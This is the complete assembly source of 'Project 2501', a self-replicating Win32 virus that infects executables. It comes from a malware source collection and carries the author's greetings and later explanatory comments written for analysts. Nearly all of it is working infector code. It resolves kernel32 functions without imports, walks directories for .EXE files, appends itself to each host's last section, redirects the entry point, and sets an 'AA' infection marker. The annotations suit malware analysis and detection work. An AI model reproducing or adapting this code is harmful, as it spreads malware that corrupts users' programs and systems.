MalwareSourceCode/Win32/Infector/Win32.Project2501.asm


comment *
Name: Project 2501
OS: Win32
Coder Belial
Heya ,
this is my first PE infector. Wow, a great feeling
to have finished it.
Credits go out to Lord Julus and BillyBelcebub, because
of their Win32 tutorials. Without them, I would never
have finished this creation. It took me nearly a year of reading
to understand all the important aspects of Win32 assembly.
Greetings go out Wallo ,Raven and the whole Virus-channel on undernet.
Also greetings to BillyBoy from Micro$oft.Thanx for your
nice viriiparadise-OS.But not soooooo much bugs in future ,ok?
I tested this virus only under Win98, so I don't know
whether it works under WinME, WinNT or Win95. But I'm sure somebody will try
it out.
The Virus is a runtime exe infector.It infects all files
in current dir and all his subdirectories.After this ,it makes
one dotdot and infects new files and subdirs until it is
in c:\ or five dotdots are done.The only payload my virus has
is a directory on the desktop named "Project2501".It is
created each run.Im thinking of putting a txtfile
in this directory ,but I have no real motivation
at the moment. A better payload is in progress. And
a nice encryption, I hope. If you think this virus
may be a bit incomplete (no encryption and no kewl
payload) then I have to say:
With releasing this source i release a loaded
gun.In the wrong hands ,it could be awful for some
harmless user.So if I release guns I dont want to release
"full-automatic-guns" .Thats for now
BeLiAL
*
; NOTE: this is MASM/TASM syntax (.model flat, proc/endp, dword ptr, struct/ends),
; not NASM as the page label claims.
.586
.model flat
.data
db 0
db 'This is the first generation of project2501'   ; only present in the first-generation binary: .data is outside start..virus_end and is never copied into a host
.code
;-----------------------------------------------------------------------
; Entry point of the infector body.  Everything from start to virus_end is
; the unit that gets appended to a host executable.  No stack frame and no
; SEH is set up, so any faulting read below terminates the process.
; All data fields are addressed as [ebp+field] with ebp = load delta.
;-----------------------------------------------------------------------
start:
call delta_setup
delta_setup:
pop ebp
sub ebp,offset delta_setup                ; ebp = delta between assembled and actual address (0 in the unrelocated first generation)
get_those_apis:
mov eax,dword ptr [esp]                   ; return address of the entry-point call; the code assumes it lies inside kernel32 (Win9x behaviour, see header: tested on Win98 only)
and eax,0ffff0000h                        ; round down to a 64 KiB boundary
mov ecx,0                                 ; probe counter for find_mz_and_pe
call find_mz_and_pe                       ; sets kernelbase / kernelpeheader, or jumps to reanimation_part on failure
call find_all_apis                        ; resolves 13 kernel32 exports by name into the dd slots near the end of the file (no import table is used)
Infection_part:
mov byte ptr [ebp+dir_counter],0
mov byte ptr [ebp+am_i_up],0
mov eax,dword ptr [ebp+image_base]        ; image_base / old_entry_point describe THIS host (written into the body when it was infected);
mov dword ptr [ebp+image_base2],eax       ; infect_file overwrites them for every new victim, so copies are taken first
mov eax,dword ptr [ebp+old_entry_point]
mov dword ptr [ebp+old_entry_point2],eax
call seek_and_destroy                     ; infect *.EXE in the cwd and one subdirectory level, then repeat after cd ".." (max 5 times)
payload_part:
call payload                              ; CreateDirectoryA on a hard-coded Win9x desktop path
reanimation_part:
cmp ebp,0                                 ; delta 0 => first generation, there is no host to return to
je exit_here
mov eax,dword ptr [ebp+image_base2]
add eax,dword ptr [ebp+old_entry_point2]
jmp eax                                   ; ImageBase (taken from the header as-is) + original AddressOfEntryPoint
exit_here:
push 0
call [ebp+ExitProcess]
;-----------------------------------------------------------------------
; find_mz_and_pe: walk downward from eax in 64 KiB steps looking for an
; 'MZ' header whose e_lfanew points at a 'PE' signature.  At most 10
; addresses are probed.
; In:  eax = 64 KiB-aligned start address, ecx = 0
; Out: [ebp+kernelbase]     = module base
;      [ebp+kernelpeheader] = address of its PE signature
; Clobbers eax, ebx, ecx, esi.  The memory reads are unguarded (no SEH).
; On failure the proc does NOT return to its caller: it jumps straight to
; reanimation_part, leaving this call's return address on the stack.
;-----------------------------------------------------------------------
find_mz_and_pe proc
add ecx,1
cmp ecx,11                                ; give up after the 10th probe
je mz_not_found
mov bx,word ptr [eax]
cmp bx,'ZM'                               ; little-endian "MZ"
je find_the_pe
sub eax,010000h                           ; step down 64 KiB
jmp find_mz_and_pe                        ; loop by jumping back to the proc's first instruction (not a recursive call)
find_the_pe:
mov esi,eax
mov ebx,dword ptr [eax+3ch]               ; e_lfanew
add eax,ebx
mov bx,word ptr [eax]
cmp bx,'EP'                               ; little-endian "PE"
jne mz_not_found
mov dword ptr [ebp+kernelbase],esi
mov dword ptr [ebp+kernelpeheader],eax
ret
mz_not_found:
jmp reanimation_part                      ; non-local exit; stack is not unwound
find_mz_and_pe endp
;-----------------------------------------------------------------------
; find_apis: resolve one kernel32 export by walking the export directory.
; Non-standard calling convention.  The caller pushes, in this order:
;   1. address of the dd slot that receives the function address
;   2. number of bytes to compare (strlen + 1 in the tables below, i.e.
;      the 0 terminator is part of the comparison)
;   3. address of the API name string            (top of stack)
; The proc pops its return address, consumes the three arguments, pushes
; the return address back and finishes with a plain ret.
; Requires [ebp+kernelbase] / [ebp+kernelpeheader] from find_mz_and_pe.
; The name loop has no upper bound (NumberOfNames is never read), so a
; name that is not exported makes it walk past the end of the table until
; it faults or hits a chance match.
;-----------------------------------------------------------------------
find_apis proc
pop esi                                   ; esi = return address
pop eax
mov dword ptr [ebp+apinameoffset],eax     ; name string
pop eax
mov dword ptr [ebp+apilenght],eax         ; byte count
pop eax
mov dword ptr [ebp+putitthere],eax        ; destination slot
push esi                                  ; put the return address back for the final ret
mov eax,dword ptr [ebp+kernelpeheader]
mov esi,dword ptr [eax+78h]               ; DataDirectory[0].VirtualAddress = export directory RVA
add esi,dword ptr [ebp+kernelbase]
add esi,1ch                               ; -> IMAGE_EXPORT_DIRECTORY.AddressOfFunctions
mov eax,dword ptr [esi]
add eax,dword ptr [ebp+kernelbase]
mov dword ptr [ebp+adress_table_VA],eax
add esi,4                                 ; AddressOfNames
mov eax,dword ptr [esi]
add eax,dword ptr [ebp+kernelbase]
mov dword ptr [ebp+name_table_VA],eax
add esi,4                                 ; AddressOfNameOrdinals
mov eax,dword ptr [esi]
add eax,dword ptr [ebp+kernelbase]
mov dword ptr [ebp+ordinal_table_VA],eax
mov esi,dword ptr [ebp+name_table_VA]
mov dword ptr [ebp+apicounter],00000000h  ; index into the name table
find_the_name:
push esi                                  ; save pointer to the current name-table entry
mov eax,dword ptr [esi]
add eax,dword ptr [ebp+kernelbase]        ; RVA -> VA of the exported name
mov esi,eax
mov edi,dword ptr [ebp+apinameoffset]
mov ecx,0
mov cl,byte ptr [ebp+apilenght]           ; only the low byte of the length is used
cld
rep cmpsb                                 ; ZF is set only if all cl bytes (terminator included) matched
jz we_found_it
pop esi
add esi,4                                 ; next name-table entry
inc dword ptr [ebp+apicounter]
jmp find_the_name
we_found_it:
pop esi ;taken from BillyBel
mov eax,dword ptr [ebp+apicounter]
shl eax,1                                 ; ordinal table entries are 16 bit
add eax,dword ptr [ebp+ordinal_table_VA]
mov esi,0
xchg eax,esi                              ; esi = entry address, eax = 0 so that lodsw below leaves the upper half clear
lodsw                                     ; ax = ordinal = index into the address table
shl eax,2                                 ; address table entries are 32 bit
add eax,dword ptr [ebp+adress_table_VA]
mov esi,eax
lodsd                                     ; eax = function RVA
add eax,dword ptr [ebp+kernelbase]        ; -> VA
mov ecx,dword ptr [ebp+putitthere]
mov dword ptr [ecx],eax                   ; store into the caller-supplied slot
ret
find_apis endp
;-----------------------------------------------------------------------
; find_all_apis: resolve every kernel32 function the body uses, via
; find_apis (export-directory walk, no import table).  Each triple pushes
; slot address, byte count and name address and then calls find_apis.
; Resolved names, in order: ExitProcess, FindFirstFileA, FindNextFileA,
; CreateFileA, CloseHandle, CreateFileMappingA, MapViewOfFile,
; UnmapViewOfFile, GetFileSize, SetFilePointer, SetEndOfFile,
; SetCurrentDirectoryA, CreateDirectoryA.  FindClose is not among them.
; Clobbers eax (plus whatever find_apis clobbers).
;-----------------------------------------------------------------------
find_all_apis proc
lea eax,[ebp+offset ExitProcess]          ; slot that receives the address
push eax
push dword ptr [ebp+exitprocesslenght]    ; strlen("ExitProcess") + 1
lea eax,[ebp+offset _ExitProcess]         ; name string
push eax
call find_apis
lea eax,[ebp+offset FindFirstFileA]
push eax
push dword ptr [ebp+findfirstfilelenght]
lea eax,[ebp+offset _FindFirstFileA]
push eax
call find_apis
lea eax,[ebp+offset FindNextFileA]
push eax
push dword ptr [ebp+findnextfilelenght]
lea eax,[ebp+offset _FindNextFileA]
push eax
call find_apis
lea eax,[ebp+offset CreateFileA]
push eax
push dword ptr [ebp+createfilelenght]
lea eax,[ebp+offset _CreateFileA]
push eax
call find_apis
lea eax,[ebp+offset CloseHandle]
push eax
push dword ptr [ebp+closehandlelenght]
lea eax,[ ebp+offset _CloseHandle]
push eax
call find_apis
lea eax,[ebp+offset CreateFileMappingA]
push eax
push dword ptr [ebp+createfilemappinglenght]
lea eax,[ebp+offset _CreateFileMappingA]
push eax
call find_apis
lea eax,[ebp+offset MapViewOfFile]
push eax
push dword ptr [ebp+mapviewoffilelenght]  ; declared as db (not dd) in the data area: the upper 3 bytes read here come from the still-zero UnmapViewOfFile slot; find_apis only uses the low byte anyway
lea eax,[ebp+offset _MapViewOfFile]
push eax
call find_apis
lea eax,[ebp+offset UnmapViewOfFile]
push eax
push dword ptr [ebp+unmapviewoffilelenght]
lea eax,[ebp+offset _UnmapViewOfFile]
push eax
call find_apis
lea eax,[ebp+offset GetFileSize]
push eax
push dword ptr [ebp+getfilesizelenght]
lea eax,[ebp+offset _GetFileSize]
push eax
call find_apis
lea eax,[ebp+offset SetFilePointer]
push eax
push dword ptr [ebp+setfilepointerlenght]
lea eax,[ebp+offset _SetFilePointer]
push eax
call find_apis
lea eax,[ebp+offset SetEndOfFile]
push eax
push dword ptr [ebp+setendoffilelenght]
lea eax,[ebp+offset _SetEndOfFile]
push eax
call find_apis
lea eax,[ebp+offset SetCurrentDirectoryA]
push eax
push dword ptr [ebp+setcurrentdirectorylenght]
lea eax,[ebp+offset _SetCurrentDirectoryA]
push eax
call find_apis
lea eax,[ebp+offset CreateDirectoryA]
push eax
push dword ptr [ebp+createdirectorylenght]
lea eax,[ebp+offset _CreateDirectoryA]
push eax
call find_apis
ret
find_all_apis endp
;-----------------------------------------------------------------------
; seek_and_destroy: directory walker and per-file infection driver.
;
;   find_first_file / find_next_file  enumerate "*.EXE" in the cwd
;   open_the_file                     open + map the file with room for the
;                                     body, check MZ / PE / marker, infect
;   search_another / close_normal     truncate untouched files, unmap, close
;   no_files_left .. go_down          descend exactly one subdirectory level
;                                     (am_i_up), come back up with "..", and
;                                     after each full pass cd ".." again
;                                     (dir_counter, at most 5 passes)
;
; State is kept in the data fields at the end of the file ([ebp+...]).
; Points an analyst / detection engineer will care about:
;   * CreateFileMappingA is called with size = filesize + body + 100, which
;     grows every candidate file on disk; files that are NOT infected are
;     shrunk back by close_not_normal, infected ones keep the extra length.
;   * the results of CreateFileMappingA / MapViewOfFile are not checked: a
;     NULL view is dereferenced at 'cmp word ptr [eax],'ZM''.
;   * infection marker: word 'AA' (4141h) at DOS-header offset 38h.
;   * only the low 16 bits of e_lfanew are used for the 'PE' check.
;   * FindFirstFileA handles are never closed (FindClose is not resolved).
;   * SetCurrentDirectoryA return values are ignored.
;-----------------------------------------------------------------------
seek_and_destroy proc
find_first_file:
mov byte ptr [ebp+infection_flag],0
lea eax,[ebp+offset FindFileData]
push eax
lea eax,[ebp+offset tosearch]             ; "*.EXE"
push eax
call [ebp+FindFirstFileA]
mov dword ptr [ebp+findfilehandle],eax
inc eax                                   ; INVALID_HANDLE_VALUE (-1) -> 0
jz no_files_left
jmp open_the_file
find_next_file:
mov byte ptr [ebp+infection_flag],0
lea eax,[ebp+offset FindFileData]
push eax
push dword ptr [ebp+findfilehandle]
call [ebp+FindNextFileA]
test eax,eax
jz no_files_left
open_the_file:
push 0                                    ; hTemplateFile
push 0                                    ; dwFlagsAndAttributes
push 3                                    ; OPEN_EXISTING
push 0                                    ; lpSecurityAttributes
push 1                                    ; FILE_SHARE_READ
push 80000000h + 40000000h                ; GENERIC_READ | GENERIC_WRITE
lea eax,[ebp+offset FindFileData.cFileName]   ; relative file name as returned by the search
push eax
call [ebp+CreateFileA]
cmp eax,0ffffffffh                        ; INVALID_HANDLE_VALUE -> skip the file
je find_next_file
mov dword ptr [ebp+filehandle],eax
push 0
push dword ptr [ebp+filehandle]
Call [ebp+GetFileSize]
calculate_new_size:
mov dword ptr [ebp+thefilesize],eax       ; original size, used by close_not_normal to shrink back
add eax,virus_end-start                   ; + body size
add eax,100                               ; + 100 bytes slack
now_make_file_mapping:
push 0                                    ; lpName
push eax                                  ; dwMaximumSizeLow (extends the file on disk)
push 0                                    ; dwMaximumSizeHigh
push 4                                    ; PAGE_READWRITE
push 0                                    ; lpAttributes
push dword ptr [ebp+filehandle]
call [ebp+CreateFileMappingA]
mov dword ptr [ebp+filemappinghandle],eax ; not checked for NULL
mov eax,dword ptr [ebp+thefilesize]
add eax,virus_end-start
add eax,100
push eax                                  ; dwNumberOfBytesToMap (same size as the mapping)
push 0                                    ; dwFileOffsetLow
push 0                                    ; dwFileOffsetHigh
push 2                                    ; FILE_MAP_WRITE
push dword ptr [ebp+filemappinghandle]
call [ebp+MapViewOfFile]
mov dword ptr [ebp+mapadress],eax         ; not checked for NULL
cmp word ptr [eax],'ZM'                   ; "MZ"
jne search_another
mov ebx,0
mov bx,word ptr [eax+3ch]                 ; e_lfanew, low word only
cmp word ptr [eax+ebx],'EP'               ; "PE"
jne search_another
cmp word ptr [eax+38h],'AA'               ; already carries the infection marker -> skip
je search_another
call infect_file                          ; sets infection_flag = 1 and the 'AA' marker
search_another:
cmp byte ptr [ebp+infection_flag],1
je close_normal
call close_not_normal                     ; not infected: restore the original length
close_normal:
push dword ptr [ebp+mapadress]
call [ebp+UnmapViewOfFile]
push dword ptr [ebp+filemappinghandle]
call [ebp+CloseHandle]
push dword ptr [ebp+filehandle]
call [ebp+CloseHandle]
jmp find_next_file
no_files_left:
cmp byte ptr [ebp+am_i_up],1              ; already inside a subdirectory -> go back up instead of descending further
je go_down
lea eax,[ebp+offset FindFileData]
push eax
lea eax,[ebp+offset allfiles]             ; "*.*"
push eax
call [ebp+FindFirstFileA]
mov dword ptr [ebp+dir_search_handle],eax ; never closed
inc eax
jz no_dirs_left
cmp byte ptr [ebp+FindFileData.cFileName],'.'   ; skips ".", ".." and any other name starting with '.'
je find_next_dir
jmp is_it_dir
find_next_dir:
lea eax,[ebp+offset FindFileData]
push eax
push dword ptr [ebp+dir_search_handle]
call [ebp+FindNextFileA]
test eax,eax
jz no_dirs_left
cmp byte ptr [ebp+FindFileData.cFileName],'.'
je find_next_dir
is_it_dir:
cmp dword ptr [ebp+FindFileData.dwFileAttributes],10h   ; exact compare with FILE_ATTRIBUTE_DIRECTORY: directories carrying any extra attribute (hidden, system, ...) are skipped
je it_is_dir
jmp find_next_dir
it_is_dir:
lea eax,[ebp+FindFileData.cFileName]
push eax
call [ebp+SetCurrentDirectoryA]           ; return value ignored
mov byte ptr [ebp+am_i_up],1
jmp find_first_file                       ; infect the subdirectory's *.EXE with the parent's dir_search_handle still open
no_dirs_left:
lea eax,[ebp+offset dotdot]               ; ".."
push eax
call [ebp+SetCurrentDirectoryA]           ; return value ignored (at the root this simply fails and the pass repeats in place)
add byte ptr [ebp+dir_counter],1
cmp byte ptr [ebp+dir_counter],5
je all_for_now
mov byte ptr [ebp+am_i_up],0
jmp find_first_file
all_for_now:
ret
go_down:
lea eax,[ebp+offset dotdot]
push eax
call [ebp+SetCurrentDirectoryA]           ; back to the parent, then resume its directory enumeration
mov byte ptr [ebp+am_i_up],0
jmp find_next_dir
seek_and_destroy endp
;-----------------------------------------------------------------------
; close_not_normal: undo the growth caused by CreateFileMappingA for a file
; that was not infected: SetFilePointer(filehandle, thefilesize, NULL,
; FILE_BEGIN) followed by SetEndOfFile.  Called while the view is still
; mapped (seek_and_destroy unmaps afterwards).  Return values are ignored.
; Clobbers eax.
;-----------------------------------------------------------------------
close_not_normal proc
push 0                                    ; dwMoveMethod = FILE_BEGIN
push 0                                    ; lpDistanceToMoveHigh
push dword ptr [ebp+thefilesize]          ; original length saved before mapping
push dword ptr [ebp+filehandle]
call [ebp+SetFilePointer]
push dword ptr [ebp+filehandle]
call [ebp+SetEndOfFile]
ret
close_not_normal endp
;-----------------------------------------------------------------------
; infect_file: append the body to the LAST section of the mapped PE and
; point the entry point at it.
; In:  [ebp+mapadress] = base of the writable file view (MZ/PE already checked)
; Out: [ebp+infection_flag] = 1
; Changes made to the host image:
;   * DOS header +38h                 := 'AA'   (infection marker)
;   * last section Characteristics    |= IMAGE_SCN_CNT_CODE (20h)
;                                      | IMAGE_SCN_MEM_EXECUTE (20000000h)
;                                      | IMAGE_SCN_MEM_WRITE (80000000h)
;   * last section VirtualSize        += body size
;   * last section SizeOfRawData      := newVirtualSize + newVirtualSize / FileAlignment
;       (the remainder-based value computed into ecx is never used, so the
;        result is generally NOT a multiple of FileAlignment; the header
;        comment says this was only ever tried on Win98)
;   * AddressOfEntryPoint             := section VA + old VirtualSize
;   * SizeOfImage                     += newSizeOfRawData - oldSizeOfRawData
; The body is copied to PointerToRawData + old VirtualSize.  If the last
; section's VirtualSize exceeds its SizeOfRawData by more than the 100-byte
; slack, that destination lies past the mapped view (not checked here).
; [ebp+image_base] / [ebp+old_entry_point] are overwritten with the
; victim's values BEFORE the copy, so the copied body carries its own host's
; return address for reanimation_part.  new_file_size is computed but never
; read.  No other header field (e.g. the checksum) is touched.
; Clobbers eax, ebx, ecx, edx, esi, edi.
;-----------------------------------------------------------------------
infect_file proc
mov byte ptr [ebp+infection_flag],1
mov eax,dword ptr [ebp+mapadress]
mov word ptr [eax+38h],'AA'               ; set the infection marker in the DOS header
mov edi,0
mov di,word ptr [eax+3ch]                 ; e_lfanew, low word only
add eax,edi ;peheader at eax
mov dword ptr [ebp+peheader_offset],eax
mov esi,dword ptr [eax+28h]               ; OptionalHeader.AddressOfEntryPoint
mov dword ptr [ebp+old_entry_point],esi
mov esi,dword ptr [eax+3ch]               ; OptionalHeader.FileAlignment
mov dword ptr [ebp+file_allign],esi
mov esi,dword ptr [eax+34h]               ; OptionalHeader.ImageBase
mov dword ptr [ebp+image_base],esi
mov esi,eax
go_to_last_section:
mov ebx,dword ptr [esi+74h]               ; NumberOfRvaAndSizes
shl ebx,3                                 ; * sizeof(IMAGE_DATA_DIRECTORY) = size of the data directory array
mov eax,0
mov ax,word ptr [esi+6h]                  ; FileHeader.NumberOfSections
dec eax                                   ; index of the last section
mov ecx,28h                               ; sizeof(IMAGE_SECTION_HEADER)
mul ecx                                   ; edx:eax = index * 28h; edx stays 0 for any realistic count and is relied on by the div below
add esi,78h                               ; PE signature + 78h = start of the data directory array
add esi,ebx
add esi,eax                               ; esi -> last IMAGE_SECTION_HEADER
modify_it:
or dword ptr [esi+24h],00000020h          ; Characteristics |= IMAGE_SCN_CNT_CODE
or dword ptr [esi+24h],20000000h          ; |= IMAGE_SCN_MEM_EXECUTE
or dword ptr [esi+24h],80000000h          ; |= IMAGE_SCN_MEM_WRITE (section becomes writable + executable)
mov eax, [esi+10h] ;code taken from Lord Julus (im not good in math)
mov dword ptr [ebp+old_raw_size],eax      ; old SizeOfRawData
add dword ptr [esi+8h],(offset virus_end - offset start)   ; VirtualSize += body size
mov eax,dword ptr [esi+8h]
mov ecx,dword ptr [ebp+file_allign]
div ecx                                   ; edx is NOT cleared here: eax = newVirtualSize / FileAlignment, edx = remainder
mov ecx,dword ptr [ebp+file_allign]
sub ecx,edx                               ; FileAlignment - remainder: computed but never used
mov dword ptr [esi+10h],eax               ; SizeOfRawData := quotient (overwritten two lines below)
mov eax,dword ptr [esi+8h]
add eax,dword ptr [esi+10h]
mov dword ptr [esi+10h],eax               ; SizeOfRawData := newVirtualSize + quotient
mov dword ptr [ebp+new_raw_size],eax
mov eax,dword ptr [esi+0ch]               ; section VirtualAddress
add eax,dword ptr [esi+8h]                ; + new VirtualSize
sub eax,(offset virus_end-offset start)   ; - body size = VA + old VirtualSize
mov dword ptr [ebp+new_entry],eax
mov eax,dword ptr [ebp+old_raw_size]
mov ebx,dword ptr [ebp+new_raw_size]
sub ebx,eax
mov dword ptr [ebp+inc_raw_size],ebx      ; growth of SizeOfRawData
mov eax,dword ptr [esi+14h]               ; PointerToRawData
add eax,dword ptr [ebp+new_raw_size]
mov dword ptr [ebp+new_file_size],eax     ; never read
mov eax,dword ptr [esi+14h]
add eax,dword ptr [esi+8]
sub eax,(offset virus_end-offset start)   ; PointerToRawData + old VirtualSize
add eax,dword ptr [ebp+mapadress]         ; -> destination inside the view
mov edi,eax
lea esi,[ebp+offset start]
mov ecx,(offset virus_end-offset start)
rep movsb                                 ; copy the body, including the data fields in their current state
mov esi,dword ptr [ebp+peheader_offset]
mov eax,dword ptr [ebp+new_entry]
mov dword ptr [esi+28h],eax               ; AddressOfEntryPoint := start of the copy
mov eax,dword ptr [ebp+inc_raw_size]
add dword ptr [esi+50h],eax               ; SizeOfImage += raw growth (no SectionAlignment rounding)
ret
infect_file endp
;-----------------------------------------------------------------------
; payload: CreateDirectoryA("c:\windows\desktop\Project2501", NULL).
; Run on every execution; result ignored.  The hard-coded Win9x path is the
; only on-disk artefact besides the infected files themselves.
;-----------------------------------------------------------------------
payload proc
push 0                                    ; lpSecurityAttributes
lea eax,[ebp+offset dir_name]
push eax
call [ebp+CreateDirectoryA]
ret
payload endp
;-----------------------------------------------------------------------
; Data area.  Lies between start and virus_end, so it is part of the body
; copied into every host and is always addressed as [ebp+field].
; The 'xxxlenght' values are strlen(name) + 1: the 0 terminator is compared
; too.  All strings below are usable as detection signatures.
;-----------------------------------------------------------------------
new_file_size dd 0                        ; set by infect_file, never read
inc_raw_size dd 0
new_entry dd 0
new_raw_size dd 0
old_raw_size dd 0
file_allign dd 0                          ; FileAlignment of the current victim
peheader_offset dd 0                      ; VA of the victim's PE signature inside the view
image_base dd 0                           ; ImageBase / AddressOfEntryPoint of the victim; once copied into the host these describe the host itself
old_entry_point dd 0
image_base2 dd 0                          ; saved copies of the two fields above, made at start-up before any new infection overwrites them
old_entry_point2 dd 0
kernelbase dd 0
kernelpeheader dd 0
adress_table_VA dd 0                      ; export directory: AddressOfFunctions
name_table_VA dd 0                        ;                   AddressOfNames
ordinal_table_VA dd 0                     ;                   AddressOfNameOrdinals
apicounter dd 00000000h
apinameoffset dd 0                        ; find_apis arguments
apilenght dd 0
putitthere dd 0
ExitProcess dd 00000000h                  ; resolved function addresses (slot, name, strlen+1)
_ExitProcess db 'ExitProcess',0
exitprocesslenght dd 12
FindFirstFileA dd 00000000h
_FindFirstFileA db 'FindFirstFileA',0
findfirstfilelenght dd 15
FindNextFileA dd 00000000h
_FindNextFileA db 'FindNextFileA',0
findnextfilelenght dd 14
CreateFileA dd 00000000h
_CreateFileA db 'CreateFileA',0
createfilelenght dd 12
CloseHandle dd 00000000h
_CloseHandle db 'CloseHandle',0
closehandlelenght dd 12
CreateFileMappingA dd 00000000h
_CreateFileMappingA db 'CreateFileMappingA',0
createfilemappinglenght dd 19
MapViewOfFile dd 00000000h
_MapViewOfFile db 'MapViewOfFile',0
mapviewoffilelenght db 14                 ; db, unlike every other length (dd); find_all_apis reads it as a dword and find_apis uses the low byte only
UnmapViewOfFile dd 00000000h
_UnmapViewOfFile db 'UnmapViewOfFile',0
unmapviewoffilelenght dd 16
GetFileSize dd 00000000h
_GetFileSize db 'GetFileSize',0
getfilesizelenght dd 12
SetEndOfFile dd 00000000h
_SetEndOfFile db 'SetEndOfFile',0
setendoffilelenght dd 13
SetFilePointer dd 00000000h
_SetFilePointer db 'SetFilePointer',0
setfilepointerlenght dd 15
SetCurrentDirectoryA dd 0
_SetCurrentDirectoryA db 'SetCurrentDirectoryA',0
setcurrentdirectorylenght dd 21
CreateDirectoryA dd 0
_CreateDirectoryA db 'CreateDirectoryA',0
createdirectorylenght dd 17
mapadress dd 0                            ; base of the current file view
infection_flag db 0                       ; 1 = current file was infected (keep the grown length)
tosearch db '*.EXE',0                     ; file search pattern
findfilehandle dd 0
filehandle dd 0
thefilesize dd 0                          ; original length of the current file
filemappinghandle dd 0
credit db 'Project2501 was coded by BeLiAL'
db 'Greetings to a nice girl from scandinavia'
dotdot db '..',0
allfiles db '*.*',0                       ; directory search pattern
dir_search_handle dd 0                    ; never passed to FindClose
am_i_up db 0                              ; 1 while inside a subdirectory
dir_name db 'c:\windows\desktop\Project2501',0   ; payload directory
dir_counter db 0                          ; number of ".." steps taken at top level (stops at 5)
; Minimal WIN32_FIND_DATAA layout (4+8+8+8+4+4+4+4+260+14 = 318 bytes,
; matching the SDK structure).  Defined after its uses in seek_and_destroy.
MAX_PATH EQU 260
FILETIME struct
dwLowDateTime DWORD ?
dwHighDateTime DWORD ?
FILETIME ends
WIN32_FIND_DATA struct
dwFileAttributes DWORD ?                  ; compared for equality with 10h (FILE_ATTRIBUTE_DIRECTORY) in seek_and_destroy
ftCreationTime FILETIME <>
ftLastAccessTime FILETIME <>
ftLastWriteTime FILETIME <>
nFileSizeHigh DWORD ?
nFileSizeLow DWORD ?
dwReserved0 DWORD ?
dwReserved1 DWORD ?
cFileName BYTE MAX_PATH dup(?)            ; relative name, passed straight to CreateFileA / SetCurrentDirectoryA
cAlternate BYTE 0eh dup(?)                ; cAlternateFileName[14]
ends
FindFileData WIN32_FIND_DATA <>           ; sits inside start..virus_end, so its 318 bytes travel with the body into every host
virus_end:                                ; end of the copied unit: (virus_end - start) is the body size used throughout
end start